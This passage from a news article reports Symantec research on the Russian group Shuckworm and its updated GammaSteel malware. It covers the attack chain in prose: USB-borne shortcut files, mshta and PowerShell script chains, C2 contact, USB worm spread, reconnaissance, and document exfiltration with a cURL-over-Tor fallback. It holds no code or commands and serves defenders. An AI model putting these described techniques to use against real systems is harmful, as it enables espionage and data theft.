files.lnk, launched from an external drive. This was recorded under the UserAssist key in the Registry, which stores a record of files, links, applications, and objects accessed by the current user through Windows Explorer.After that file was executed, it launched mshta.exe, a Windows binary that can be used to execute VBScript and JScript locally on Windows. In this case, it was used to execute a JavaScript command that invoked an ActiveX object and used wscript.exe to execute a file called ~.drv.This is a highly obfuscated file whose execution resulted in the creation of two additional files with names of the format NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms. The goal of one of the files is to contact the attackers’ command-and-control (C2) server and maintain a persistent connection with it.The C2 servers’ IP addresses are obtained by contacting URLs hardcoded in the file and retrieving the current addresses from them. The result is two IP addresses and a domain name that all point to attacker-controlled servers.”The [C2] server is similar to others that have been used by Shuckworm in the past, as shown in an investigation by Recorded Future where the group leveraged Cloudflare tunnels for their [C2] infrastructure,” the researchers said.The second file in the attack chain modifies Registry values in order to change how Windows Explorer displays hidden and system files. It then infects any removable drives attached to the computer by copying .lnk files into any directories found on them. This is behavior typical of USB worms.The file names observed by Symantec were in Ukrainian, but translate to terms such as: “Conduct plan”, “Special message”, “letter to”, “SPECIAL INSPECTION”, “Wound report”, “deployment”, “AIR DEFENSE COMBAT ORDER”, “Commander’s decision on defense”, “Obligation”, “Combat calculation”, “GUR support”, “Information on the dead”, “BMP”, “contract extension”, and “Reference about meeting with the source”.On one machine, the researchers observed the C2 server delivering obfuscated code which was then launched via PowerShell. This started a chain of obfuscated scripts that reached out to more servers and downloaded additional PowerShell scripts.One script served as a reconnaissance tool collecting information about the computer, including system information, the name of security software running, available space on disks, the directory tree of the Desktop folder, and a list of all running processes. All this collected information was sent back to the C2 server.
New GammaSteel variant: The second script was a PowerShell version of GammaSteel that exfiltrated all files with certain extensions from specified directories such as Desktop, Download, and Documents. The targeted extensions included .doc, .docx, .xls, .xlsx, .ppt, .pptx, .vsd, .vsdx, .rtf, .odt, .txt and .pdf.The new GammaSteel version uses PowerShell web requests to exfiltrate files, and if it fails, it then falls back to using the cURL command line tool with a Tor proxy to send data out. There is also code that suggests the web service write.as was potentially used as a fallback data exfiltration channel as well.”This attack does mark something of an increase in sophistication for Shuckworm, which appears to be less skilled than other Russian actors, though it compensates for this with its relentless focus on targets in Ukraine,” the researchers said.The Symantec report includes indicators of compromise such as file hashes, file names, URLs, IP addresses, and more, that can be used by security teams to build detections or threat hunting rules.
First seen on csoonline.com
Jump to article: www.csoonline.com/article/3959665/russian-shuckworm-apt-is-back-with-updated-gammasteel-malware.html
